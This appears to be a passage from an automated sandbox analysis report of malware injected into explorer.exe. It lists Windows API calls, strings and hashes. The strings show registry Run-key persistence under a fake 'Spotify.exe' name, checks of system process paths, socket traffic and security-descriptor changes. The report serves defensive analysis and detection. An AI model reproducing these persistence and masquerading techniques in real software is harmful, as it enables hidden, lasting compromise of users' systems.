                            • Part of subcall function 01197EF0: CoInitializeEx.COMBASE ref: 01197FFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$FreeThreadlstrlen$InitializeLocal$AllocAllocateCheckCleanupCloseEventFolderHandleKnownMembershipPathStartupTaskToken_errno_invalid_parameter_noinfo
                          • String ID: "%s%s"$Spotify.exe${669627E2-6B39-4990-B906-8786734FF1DD}
                          • API String ID: 2779143808-1023982500
                          • Opcode ID: a82c63f49fc84d51f6ceb823c207fd6abdfa60ac5806495aac224a5eadf16768
                          • Instruction ID: 38a37e63344a0b77943ac9b17367ed622de38b3eeaba893e741b4ea3136b0005
                          • Opcode Fuzzy Hash: a82c63f49fc84d51f6ceb823c207fd6abdfa60ac5806495aac224a5eadf16768
                          • Instruction Fuzzy Hash: 69515B31104B9586FB3DEF64F8987DA77A5F798348F40412ADA8A86A64DF3CC189CB41
                          APIs
                          Yara matches
                          Similarity
                          • API ID: Heap$CreateInformationVersion
                          • String ID:
                          • API String ID: 3563531100-0
                          • Opcode ID: c525bb8dc8427b67045047140108d528e73815ef1e63f505b45dd767e355412e
                          • Instruction ID: 61c29c7c1b8f3ecfa20baa02da060e850f9ad9ca4dc62c33b8cefdcf3de47ad6
                          • Opcode Fuzzy Hash: c525bb8dc8427b67045047140108d528e73815ef1e63f505b45dd767e355412e
                          • Instruction Fuzzy Hash: 03E0DF78615F5182FB8C5B14E899BD92261F789381F806029EB4E42764DF3CC08BC708
                          APIs
                          Strings
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL
                          • API String ID: 2574300362-2969658442
                          • Opcode ID: f90370e5532e15aea78f9185266f08c44aefdf0f6daa0f53754c809366cb5b92
                          • Instruction ID: 7d6b9f347e311238f35b472639f9c6e2aed3dc907d8f44ae0ab2b39207dda178
                          • Opcode Fuzzy Hash: f90370e5532e15aea78f9185266f08c44aefdf0f6daa0f53754c809366cb5b92
                          • Instruction Fuzzy Hash: 27B2E83A218B89C5EB78CB14F4943EAB760F7C9759F810516CA8E43B68DF38C199CB41

                           Control-flow Graph (graph image and node list not reproduced)
                          APIs
                          Yara matches
                          Similarity
                          • API ID: CreateErrorEventLastclosesocketshutdownsocket
                          • String ID:
                          • API String ID: 1739004367-0
                          • Opcode ID: dcaf40f4610bbbedde6c4bc399f23527267634a2a82ab33fdc6244b7fdff342a
                          • Instruction ID: 3c3188979d06db3188d2dea25b5ba7c8339c8451e44c9afd2ed96031e3f2c02c
                          • Opcode Fuzzy Hash: dcaf40f4610bbbedde6c4bc399f23527267634a2a82ab33fdc6244b7fdff342a
                          • Instruction Fuzzy Hash: B8F1ED36228AC4CAD7689F15F8847DAB7A0F789755F004126EB9B87A69DF3CC445CF01

                           Control-flow Graph (graph image and node list not reproduced)
                          APIs
                          Strings
                          Yara matches
                          Similarity
                          • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpy
                          • String ID: .DLL
                          • API String ID: 2968648924-899428287
                          • Opcode ID: 94ce4cef34f48db25710ebb7938b358f5a319298ed3ba92ef7ae4f5844074c4b
                          • Instruction ID: 455bb72b93734b870986b6d69c7d07a267edd811366cf39788a8f4b3d78d7895
                          • Opcode Fuzzy Hash: 94ce4cef34f48db25710ebb7938b358f5a319298ed3ba92ef7ae4f5844074c4b
                          • Instruction Fuzzy Hash: 61D1DC76208B8486E768DB19F49439AB7A1F7C47A4F504225D79E87BA8DF3CC489CF40

                           Control-flow Graph (graph image and node list not reproduced)
                          APIs
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                          • LocalAlloc.KERNEL32 ref: 0119F230
                          • wnsprintfW.SHLWAPI ref: 0119F275
                          • RegOpenKeyW.ADVAPI32 ref: 0119F29B
                          • RegSetValueExW.ADVAPI32 ref: 0119F2D3
                          • RegCloseKey.ADVAPI32 ref: 0119F2DE
                          • RegOpenKeyW.ADVAPI32 ref: 0119F300
                          • RegSetValueExW.ADVAPI32 ref: 0119F338
                          • RegCloseKey.ADVAPI32 ref: 0119F343
                          • LocalFree.KERNEL32 ref: 0119F34E
                          • LocalFree.KERNEL32 ref: 0119F359
                          Strings
                          • {669627E2-6B39-4990-B906-8786734FF1DD}, xrefs: 0119F247
                          • %s%s %s, xrefs: 0119F264
                          • Spotify.exe, xrefs: 0119F253
                          • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0119F28D
                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0119F2F2
                          Yara matches
                          Similarity
                          • API ID: Local$Freelstrlen$AllocCloseOpenValue$FolderKnownPathTaskwnsprintf
                          • String ID: %s%s %s$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$Spotify.exe${669627E2-6B39-4990-B906-8786734FF1DD}
                          • API String ID: 1790340015-4130844771
                          • Opcode ID: 899e22331facbcdfbf37d5bf2fdf3218fac895a1e0c2bb22c5d9f5c6331109ac
                          • Instruction ID: 466084487701c7a857861851c8c3c6fd41e32172d7b3f41fb7b0fe3a6031ad3f
                          • Opcode Fuzzy Hash: 899e22331facbcdfbf37d5bf2fdf3218fac895a1e0c2bb22c5d9f5c6331109ac
                          • Instruction Fuzzy Hash: 25312A35208A4596EB18DF19F8847DA77B0F785798F50012AEB9E83B68DF7DC54ACB00

                           Control-flow Graph (graph image and node list not reproduced)
                          APIs
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem_errno_invalid_parameter_noinfolstrcmpi
                          • String ID: %s\svchost.exe
                          • API String ID: 3414592467-1955667316
                          • Opcode ID: e58c8e807cef45b58eb412dc696d3ca7086278a892d9b9d0cc68856432e9e4b3
                          • Instruction ID: 0cb0ccca386293e5d08132085dd7e6989bb66359d8357ec021db90d7b5a1d6bd
                          • Opcode Fuzzy Hash: e58c8e807cef45b58eb412dc696d3ca7086278a892d9b9d0cc68856432e9e4b3
                          • Instruction Fuzzy Hash: C621FA35254A5582EB389B15E8943EA6361FBC8BA9F000135EB8E47B78CF3CC599CB40

                           Control-flow Graph (graph image and node list not reproduced)
                          APIs
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$DirectoryFileModuleNameWindows_errno_invalid_parameter_noinfolstrcmpi
                          • String ID: %s\explorer.exe
                          • API String ID: 3179574994-2893622748
                          • Opcode ID: 428531350e7e704850b3dc85deda95e0abcba54834e33c1fd42cb07a9522b708
                          • Instruction ID: 812eea76976b40c98fa62d3ca793359f62c7caaa098d3c666bc29e95fffa8eea
                          • Opcode Fuzzy Hash: 428531350e7e704850b3dc85deda95e0abcba54834e33c1fd42cb07a9522b708
                          • Instruction Fuzzy Hash: DC21FC35254A5182EB389F15F8947AA67A1FBC8B99F040135EB8E47B78CF3CC599CB40

                           Control-flow Graph (graph image and node list not reproduced)
                          APIs
                          • lstrlenW.KERNEL32 ref: 011B531D
                            • Part of subcall function 011B58E0: CoInitializeEx.COMBASE ref: 011B590A
                            • Part of subcall function 011B58E0: CoCreateGuid.COMBASE ref: 011B591D
                            • Part of subcall function 011B58E0: StringFromGUID2.COMBASE ref: 011B593B
                            • Part of subcall function 011B58E0: wsprintfA.USER32 ref: 011B595D
                            • Part of subcall function 011B58E0: LocalAlloc.KERNEL32 ref: 011B596D
                            • Part of subcall function 011B58E0: und_memcpy.LIBCMTD ref: 011B59E4
                            • Part of subcall function 011B58E0: LocalFree.KERNEL32 ref: 011B59F1
                            • Part of subcall function 011B58E0: CoUninitialize.COMBASE ref: 011B59F7
                          • setsockopt.WS2_32 ref: 011B541C
                          • LocalFree.KERNEL32 ref: 011B58A2
                            • Part of subcall function 011B4870: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B48AF
                            • Part of subcall function 011B5AD0: LocalAlloc.KERNEL32 ref: 011B5AE1
                            • Part of subcall function 011B5AD0: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B56ED), ref: 011B5AFF
                            • Part of subcall function 011B5AD0: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B56ED), ref: 011B5B17
                            • Part of subcall function 011B4DC0: WSACreateEvent.WS2_32 ref: 011B4E59
                          • LocalFree.KERNEL32 ref: 011B5894
                            • Part of subcall function 011B4870: WSACreateEvent.WS2_32 ref: 011B4909
                          • CreateEventW.KERNEL32 ref: 011B5810
                          • WSAEventSelect.WS2_32 ref: 011B583F
                          • und_memcpy.LIBCMTD ref: 011B586F
                          • CloseHandle.KERNEL32 ref: 011B5886
                          • shutdown.WS2_32 ref: 011B58B5
                          • closesocket.WS2_32 ref: 011B58C3
                            • Part of subcall function 011B5CE0: LocalAlloc.KERNEL32 ref: 011B5CF1
                            • Part of subcall function 011B5CE0: lstrcpyW.KERNEL32 ref: 011B5D35
                            • Part of subcall function 011B5CE0: GetModuleFileNameW.KERNEL32 ref: 011B5D55
                            • Part of subcall function 011B5CE0: LocalFree.KERNEL32 ref: 011B5D64
                            • Part of subcall function 011B4DC0: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Local$Free$CreateEventTimer$Alloc$ChangeConcurrency::details::platform::__Queueund_memcpy$CloseFileFromGuidHandleInitializeLibraryLoadModuleNameSelectStringUninitializeclosesocketlstrcpylstrlensetsockoptshutdownwsprintf
                          • String ID: 8
                          • API String ID: 1160820747-4194326291
                          • Opcode ID: 703cba8a721852ba4601ddda7d12de819128d615945ba6f413280689a9c86afc
                          • Instruction ID: 7a4c6c8bb79ed7c3ac405d7ca4895bc07be70aeea830a29dacbf934292ff2ab0
                          • Opcode Fuzzy Hash: 703cba8a721852ba4601ddda7d12de819128d615945ba6f413280689a9c86afc
                          • Instruction Fuzzy Hash: 0BD1B176218BC08AE7B59B15E4843CAB7A5F389798F804526EB8D47B68DF7CC194CF40

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister
                          • String ID: {AD5A477B-A974-48CA-8A4F-BBC77609C010}
                          • API String ID: 1237952354-284598728
                          • Opcode ID: ad3a778cf11879ea102bad5402e918288342321862edad1c1d477f0e84bd2696
                          • Instruction ID: f8a928655c81b3a587ab9a15a34a46635d5b99fd7def89f26e2d015ac9a31d67
                          • Opcode Fuzzy Hash: ad3a778cf11879ea102bad5402e918288342321862edad1c1d477f0e84bd2696
                          • Instruction Fuzzy Hash: 27310D75214B89C2E768AF14F8947DA77B1F784758F90113AE78A46AB4DF3DC14ACB00
                          APIs
                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B48AF
                            • Part of subcall function 011B34A0: recv.WS2_32 ref: 011B34CC
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timer$ChangeConcurrency::details::platform::__Queuerecv
                          • String ID:
                          • API String ID: 2709879575-0
                          • Opcode ID: ee436ca40872bfd55d0d14185852ad7327cbddb359225007291187d638ed94ef
                          • Instruction ID: 0268fe61e2eaeb776dddabe2483bf0e95f7eb3cff9f203f324b914d1eae218f5
                          • Opcode Fuzzy Hash: ee436ca40872bfd55d0d14185852ad7327cbddb359225007291187d638ed94ef
                          • Instruction Fuzzy Hash: BBC1C476208BC0CAE779CF19E4947EAB7A1F788744F01811AD78A87B59DB79C485CF02
                          APIs
                          • GetModuleFileNameW.KERNEL32 ref: 0119909E
                          • GetWindowsDirectoryW.KERNEL32 ref: 011990D7
                          • GetSystemDirectoryW.KERNEL32 ref: 01199110
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • StrCmpIW.SHLWAPI ref: 011991E8
                          • StrCmpIW.SHLWAPI ref: 011991FF
                          • StrCmpIW.SHLWAPI ref: 01199216
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Directory$FileModuleNameSystemWindows_errno_invalid_parameter_noinfo
                          • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                          • API String ID: 4125122012-2596767422
                          • Opcode ID: 0ce3380aaa9718ec791bb1e918982070712ec6b03a28ba819b3a061c451fb4e7
                          • Instruction ID: 0bf7544119ed1cffb4d12e36df33df38d4f1396b9210896813c72b2c9b6937db
                          • Opcode Fuzzy Hash: 0ce3380aaa9718ec791bb1e918982070712ec6b03a28ba819b3a061c451fb4e7
                          • Instruction Fuzzy Hash: 4F411D21314AC992DB74DB24E8943DB63A6F788744F804536879DC3A68EF3DC619CB41
                          APIs
                          • SHGetKnownFolderPath.SHELL32 ref: 0119F587
                          • lstrlenW.KERNEL32 ref: 0119F59A
                          • lstrlenW.KERNEL32 ref: 0119F5B5
                          • LocalAlloc.KERNEL32 ref: 0119F5DC
                          • CoTaskMemFree.COMBASE ref: 0119F647
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • lstrlenW.KERNEL32 ref: 0119F620
                          • CoTaskMemFree.COMBASE ref: 0119F635
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$FreeTask$AllocFolderKnownLocalPath_errno_invalid_parameter_noinfo
                          • String ID: %s\%s\
                          • API String ID: 2748012262-2168696002
                          • Opcode ID: c67f25852d0db48f00a9db175582164c04bb3a1d8cde8ffb0c1091e28077b100
                          • Instruction ID: ead09d3de8cec1818f7ff58e222884efa6b697635b6bdddc79aa94e2dcf1aefb
                          • Opcode Fuzzy Hash: c67f25852d0db48f00a9db175582164c04bb3a1d8cde8ffb0c1091e28077b100
                          • Instruction Fuzzy Hash: BB310D32218A8586DB54DB29F89439AB7B1F7C9B94F544025EB8E83B68DF7CC546CB00
                          APIs
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                          • GetFileAttributesW.KERNEL32 ref: 0119FB60
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • DeleteFileW.KERNEL32 ref: 0119FB1A
                          • RemoveDirectoryW.KERNEL32 ref: 0119FB2D
                          • LocalFree.KERNEL32 ref: 0119FB40
                          • LocalFree.KERNEL32 ref: 0119FB55
                          • GetFileAttributesW.KERNEL32 ref: 0119FB77
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFreeLocallstrlen$Attributes$AllocDeleteDirectoryFolderKnownPathRemoveTask_errno_invalid_parameter_noinfo
                          • String ID: %s%s$Spotify.exe
                          • API String ID: 2317434139-2674492433
                          • Opcode ID: 914aa335a63efcf3c90bc4a69d0561e7c4bba87e2c4adeacd6fcf01560c629b6
                          • Instruction ID: 35a4c94e9e942725b94b987da1bfadf850de7274a8caa33e0eb549a3286df679
                          • Opcode Fuzzy Hash: 914aa335a63efcf3c90bc4a69d0561e7c4bba87e2c4adeacd6fcf01560c629b6
                          • Instruction Fuzzy Hash: EB21103122498591DB68DF24E8983DA6761F7C4B54F800626D76EC36B8EF3CC98ACB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalUninitialize$AllocCreateFreeFromGuidInitializeStringund_memcpywsprintf
                          • String ID:
                          • API String ID: 3539965953-0
                          • Opcode ID: f1b201f5a9eed3eaf9a523d0c2121b2386c6f2c61ced3d45e5eb14289178c037
                          • Instruction ID: 65d8ca4ee74c4bd1f93ae21fb54599b0eb953cf0445968927151326beaadf6d4
                          • Opcode Fuzzy Hash: f1b201f5a9eed3eaf9a523d0c2121b2386c6f2c61ced3d45e5eb14289178c037
                          • Instruction Fuzzy Hash: 00210E72324BC582DB78EF25E8943DE6361F7C5B84F844429D68A87A64DF3CC149CB40
                          APIs
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegCreateKeyExW.KERNEL32 ref: 01195340
                          • RegSetValueExW.KERNEL32 ref: 01195374
                          • RegCloseKey.ADVAPI32 ref: 01195383
                          • RegCloseKey.ADVAPI32 ref: 01195395
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$CreateValue_errno_invalid_parameter_noinfo
                          • String ID: ?$SOFTWARE\%s${2046C745-B848-47EE-8068-B039EAC15A1C}
                          • API String ID: 3235468379-835248637
                          • Opcode ID: 40145f79fe73d992d313a2094e33a8d981a89d509cec35542f6e7a0e3b56c4a9
                          • Instruction ID: 01bf905eb8a07c7fda5b08a858bcbe7e3c9a5f44cea9cddfcd0f9ff9b16143b0
                          • Opcode Fuzzy Hash: 40145f79fe73d992d313a2094e33a8d981a89d509cec35542f6e7a0e3b56c4a9
                          • Instruction Fuzzy Hash: 67214C32218B84C2E754DF65F8987DAB7A5F784798F800126EA8E43B68DFBCC145CB04
                          APIs
                          • SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7AF
                          • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7C3
                          • wnsprintfW.SHLWAPI ref: 0119F7FC
                          • lstrlenW.KERNEL32 ref: 0119F80B
                          • CoTaskMemFree.COMBASE ref: 0119F81D
                          • CoTaskMemFree.COMBASE ref: 0119F82F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeTask$AllocFolderKnownLocalPathlstrlenwnsprintf
                          • String ID: %s\%s
                          • API String ID: 1665550476-4073750446
                          • Opcode ID: 7be9eb387fcb5a12c99e2256ef6ef75da49a5be100ce487a794dec0c98c24ef7
                          • Instruction ID: 7d4144c904f0c7a3fbb6a7e7639eac77baa333434cda02fcbbe2783cd644d09e
                          • Opcode Fuzzy Hash: 7be9eb387fcb5a12c99e2256ef6ef75da49a5be100ce487a794dec0c98c24ef7
                          • Instruction Fuzzy Hash: 01111C31628A9582E7489F15E8547DA77A0FBC4B98F405025FA8F86A38DF7CC046CB00
                          APIs
                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 011AE3F7
                          • GetSecurityDescriptorSacl.ADVAPI32 ref: 011AE415
                          • SetNamedSecurityInfoW.ADVAPI32 ref: 011AE44E
                          • LocalFree.KERNEL32 ref: 011AE45D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                          • String ID: S:(ML;;NW;;;LW)
                          • API String ID: 173816248-495562761
                          • Opcode ID: f905f424248e15589d132c37e9be0cc03c94c5fa6fb97b89272881f21c89416e
                          • Instruction ID: 9f6249a4b67f7e3277f3f0a61de390312365f0d85b5c254f30adb127a55ce742
                          • Opcode Fuzzy Hash: f905f424248e15589d132c37e9be0cc03c94c5fa6fb97b89272881f21c89416e
